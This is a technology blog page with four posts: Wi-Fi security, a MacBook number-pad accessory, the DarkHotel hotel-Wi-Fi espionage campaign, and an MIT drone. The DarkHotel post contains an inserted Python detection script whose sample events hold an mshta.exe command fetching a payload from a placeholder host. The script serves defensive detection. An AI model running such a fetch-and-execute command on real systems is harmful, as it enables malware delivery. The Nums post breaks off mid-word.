Rick Richardson's Views On Technology

3 Considerations for Better Wi-Fi Security

8/27/2017

More and more traffic is being carried via Wi-Fi networks, and as traffic figures rise, so do security concerns. Last year, 60% of mobile data traffic was offloaded onto the fixed network via Wi-Fi according to Cisco’s Visual Networking Index. Cisco predicts that by 2021, 50% of all IP traffic will be Wi-Fi (30% will be carried by fixed networks and 20% via cellular networks).

Security for that traffic is becoming more important, mainly because enterprises utilize Wi-Fi for business-critical services and applications. Here are three considerations for Wi-Fi security:

1. Consider Internet of Things (IoT) devices. As more devices get connected, the relationship of those devices to the corporate network or the open Internet must be examined with an eye toward security.

“Without a doubt, the number one way that IoT devices are connecting to the Internet is Wi-Fi,” said Ryan Orsi, director of strategic alliances at Wi-Fi security company WatchGuard Technologies. He said that customers are coming to his business asking how they can prevent devices such as security cameras, DVRs and other connected devices from being the next zombie recruits in a Mirai-botnet-like attack. While IoT vendors are bringing more and more devices to market at lower prices, Orsi noted, there are no security regulations around such devices outside of the Food and Drug Administration requirements for health-related devices. Some organizations such as ICSA Labs have been attempting to fill that gap by offering security certification for IoT devices.

Adlane Fellah, managing director of Wi-Fi360, said that the number one concern for IoT in an industrial environment is security. He emphasized that Wi-Fi can play a crucial role “to enable better and easier securitization of IoT devices, so that [end users] don’t have to be programmers to make them safe and reliable — and that is as important for the home as it is for industrial applications.”

2. Consider that employees may find security workarounds. When employees work both remotely and in the office, they need secure ways to access their applications or transfer files — or they’ll use unsafe ones, relying on public Wi-Fi or tethering to a personal LTE device to create a potentially unsecured Wi-Fi hotspot, for example. iPass’ 2017 Mobile Security report found that on a global basis, 75% of enterprises still allow or encourage the use of MiFi devices — but in France, 29% of businesses have banned them because of security concerns.

At last year’s Republican National Convention, security company Avast set up several experimental, unauthorized Wi-Fi access points to see how many users would connect to networks with common names like “ATTWifi” or “Google Starbucks.” “Over the course of a day, Avast saw more than 1.6Gbs transferred from more than 1,200 users,” the company reported. “Moreover, 68.3% of users’ identities were exposed when they connected, and 44.5% of Wi-Fi users checked their emails or chatted via messenger apps.”

3. Consider that some employees may be more vulnerable to attack than others. iPass’ mobile security report found that 40% of enterprises worry that their C-level executives could be hacked while using public Wi-Fi outside of the office.

“The grim reality is that C-level executives are by far at the greatest risk of being hacked outside of the office,” said Raghu Konka, VP of engineering at iPass, in a comment on the mobile security report results. “They are not your typical 9-5 office workers. They often work long hours, are rarely confined to the office, and have unrestricted access to the most sensitive company data imaginable. They represent a dangerous combination of being both highly valuable and highly available, therefore a prime target for any hacker.
​
“Organizations are more aware of the mobile security threat than ever, but they still struggle to find the balance between safety and productivity,” Konka added. “While businesses understand that free public Wi-Fi hotspots can empower employees to do their job and be more productive, they are also fearful of the potential security threat.”


Your MacBook Struggling with Spreadsheets? You’ll Love Nums

8/20/2017

When it comes to design, you would be hard pressed to criticize Apple. Everything the company makes is both beautiful and highly functional. But even Apple can’t cover every base. For instance, you cannot realistically squeeze a full number keypad into a MacBook. You can buy plug-in pads — but that means you need a spare USB port and a bigger bag. Alternatively, you could just use Nums. 

Nums is an ultra-thin number glass film that comes with an application powered by patented algorithms. It transforms your trackpad into a number pad, it launches your favorite apps and websites with just a swipe, and it protects your delicate laptop trackpad from scratches and other damage.

This thin piece of glass turns your trackpad into a dedicated number pad. It’s compatible with pre-2016 and current MacBook models and features the numbers 0-9 plus multiple symbols and an enter key.

Like all the best inventions, this glass plate keeps things simple. It doesn’t work with Bluetooth, and there is no battery to charge. But that’s fine, because this little accessory helps you input numbers, launch apps and protect your MacBook. To use Apple’s catch phrase, “It just works!”

To start punching in numbers, you simply place Nums over the touchpad of your MacBook. The magic is made possible by the special Nums software. This gives your MacBook numerical superpowers, so you can punch in numbers at will. The software also integrates with macOS.
​
The folks behind Nums say that you can more than double your number typing speed with this accessory. Furthermore, you will reduce your finger movement by 66%. You can pre-order the devic

Hackers Are Using Hotel Wi-Fi to Spy and Steal Data

8/13/2017

An advanced hacking and cyberespionage campaign against high-value targets has returned.

The so-called 'DarkHotel' group has been active for over a decade, with a signature brand of cybercrime that targets business travelers with malware attacks, using the Wi-Fi in luxury hotels across the globe.

Hotel Wi-Fi hotspots are compromised in order to help deliver the payload to the selected pool of victims. The exact methods of compromise remain uncertain, but cybersecurity experts believe it involves attackers remotely exploiting vulnerabilities in server software or infiltrating the hotel and gaining physical access to the machines.

Those behind the campaign have continually evolved their tactics and malware payloads, blending phishing and social engineering with a complex Trojan, in order to conduct espionage on corporate research and development personnel, CEOs, and other high-ranking corporate officials.

But now the actors behind DarkHotel have changed tactics again, using a new form of malware known as Inexsmar to attack political targets. Researchers at Bitdefender – who've analyzed the malware strain – have linked the Inexsmar campaign to DarkHotel because of similarities with payloads delivered by previous campaigns.

In common with other espionage campaigns, the Inexsmar attack begins with high-level phishing emails individually designed to be interesting and convincing to the target. "The social engineering part of the attack involves a very carefully crafted phishing email targeted to one person at a time," Bogdan Botezatu, senior e-threat analyst at Bitdefender, told ZDNet.

Researchers remain uncertain about who is being targeted by the campaign – and the malware sample doesn't provide clues about this – but the nature of the phishing emails points towards government and political targets.

Within the email is a self-extracting archive package, winword.exe, which when executed begins the Trojan downloader process.

In order to avoid the victim getting suspicious, the downloader opens a decoy Word document called 'Pyongyang Directory Group email SEPTEMBER 2016 RC_Office_Coordination_Associate.docx'.

It shows a list of supposed contacts in the North Korean capital, with references to organizations including FAO, UNDP, UN, UNICEF, and WFP. It even contains warnings about spammers and ensuring privacy – with the victim reading this just as their privacy is being compromised by hackers.

In order to prevent detection, the malware is downloaded in stages – another element of the campaign which links it to DarkHotel. The first stage of the downloader even hides malicious codes and strings inside an otherwise legitimate OpenSSL binary by statically linking the malicious code to the otherwise unrelated library code.

Following this, the malware runs a mshta.exe operation – a legitimate Microsoft HTML Application host needed to execute .HTA files – to download the second part of the payload and compromise the target with the Trojan malware.
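The chain described above (a binary named winword.exe that is not Word, followed by mshta.exe fetching a remote payload) can be hunted for in process-creation telemetry. The following is an added example, not code from the original article or from the Bitdefender paper; the event field names, the Office install path, the parent-child relationship between the two processes, and all sample paths and hosts are assumptions.

```python
import re
from ntpath import basename  # Windows path rules on any OS

# Assumption: genuine Word runs from the Office directory under Program Files.
OFFICE_DIR = re.compile(r"^[a-z]:\\program files( \(x86\))?\\microsoft office\\", re.I)
REMOTE_URL = re.compile(r"https?://", re.I)

def is_fake_winword(path):
    """True when a binary is named winword.exe but sits outside the Office directory."""
    return basename(path).lower() == "winword.exe" and not OFFICE_DIR.match(path)

def findings(event):
    """Return the names of the rules one process-creation event matches."""
    hits = []
    if is_fake_winword(event["image"]):
        hits.append("winword_outside_office_dir")
    if basename(event["image"]).lower() == "mshta.exe":
        if REMOTE_URL.search(event["command_line"]):
            hits.append("mshta_remote_url")
        if is_fake_winword(event["parent_image"]):
            hits.append("mshta_child_of_fake_winword")
    return hits

def triage(events):
    """Keep only the events that matched at least one rule."""
    return [(e["image"], findings(e)) for e in events if findings(e)]

# Constructed sample events (hypothetical field names, paths and host).
FAKE = r"C:\Users\alice\AppData\Local\Temp\winword.exe"
SAMPLE_EVENTS = [
    {"image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": r'WINWORD.EXE "C:\Users\alice\Documents\report.docx"',
     "parent_image": r"C:\Windows\explorer.exe"},
    {"image": FAKE, "command_line": "winword.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe http://stage2.example.invalid/next.hta",
     "parent_image": FAKE},
    {"image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'mshta.exe "C:\Tools\inventory.hta"',
     "parent_image": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for image, hits in triage(SAMPLE_EVENTS):
        print(image, hits)
```

Genuine Word and a locally launched .hta file pass without a finding, so the rules key on the location of the binary and the remote URL rather than on the process names alone.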

Researchers suggest the multi-stage Trojan download is an evolutionary step to keep the malware competitive as victims' defenses improve.

"This approach serves their purpose much better as it both assures the malware stays up to date via system persistence – not achievable directly using an exploit, and giving the attacker more flexibility in malware distribution," says the paper by malware researchers Cristina Vatamanu, Alexandru Rusu, and Alexandru Maximciuc.

DarkHotel is a highly sophisticated hacking operation, stockpiling digital certificates to aid in the distribution of malware and deploy backdoors with code hidden under many layers of protection.

The group is careful to cover their tracks but the nature of the attacks and the way DarkHotel picks victims potentially indicates involvement of a nation state actor.
​
"Attribution is usually difficult with this type of attack, but its complexity and the cherry-picked victims show that it is likely a state-backed threat with serious skills and resources," said Botezatu.


MIT’s New Drone – 5-Day Flight Time

8/6/2017

Last month, a team of MIT engineers launched Jungle Hawk Owl from the back of a compact car. It was the first flight for the 24-foot-wide drone, which the team believes is capable of staying in the air for five days on a single tank of gas.

The craft was designed to address a challenge posed by the U.S. Air Force. The teams were asked to develop a UAV (unmanned aerial vehicle) powered by solar energy that was able to stay in the air for long periods. The idea was to design a vehicle that could help deliver communications to areas impacted by natural disasters or other emergencies. Weather balloons have traditionally been the choice, but they drift with the wind and often don’t stay in the air long enough to be effective.

Not long after they began to work on the problem, the team abandoned the solar option. According to team co-lead, Professor Warren Hoburg, current solar technologies would require a much larger drone with a much larger surface area for panels, coupled with a large, heavy battery. Solar also runs into issues during the winter months and at latitudes far from the equator because of shortened daylight hours.

The winning team’s final design was built out of lightweight materials like carbon fiber and Kevlar, weighing a total of 55 pounds empty and 150 pounds with payload and a tank full of gas. The parts can be easily disassembled and shipped to affected areas, and the payload is the perfect size for carrying a shoebox-sized communication device designed by MIT’s Lincoln Labs, which helped support the project.

Currently, the school is working with the FAA for permission to keep the drone in the air for the full five days as it continues its testing over the summer.

    Author

    Rick Richardson, CPA, CITP, CGMA

    Rick is the editor of the weekly newsletter, Technology This Week. You can subscribe to it by visiting the website.

    Rick is also the Managing Partner of Richardson Media & Technologies, LLC. Prior to forming his current company, he had a 28-year career in technology with Ernst & Young, the last twelve years of which he served as National Director of Technology.

    Mr. Richardson has been named to the "Technology 100", the annual honors list of the 100 key achievers in technology in America. He has also been honored by the American Institute of CPAs with two Lifetime Achievement awards and a Special Career Recognition Award for his contributions to the profession in the field of technology.

    In 2012, Rick was inducted into the Accounting Hall of Fame by CPA Practice Advisor Magazine. He has also been named to the 100 most influential individuals in the accounting profession in America by Accounting Today magazine.

    In 2017, Rick was inducted as a Marquis Who’s Who Lifetime Achiever, a registry of professionals who have excelled in their fields for many years and achieved greatness in their industry.

    He is a sought-after speaker around the world, providing his annual forecast of future technology trends to thousands of business executives, professionals, community leaders, educators and students.
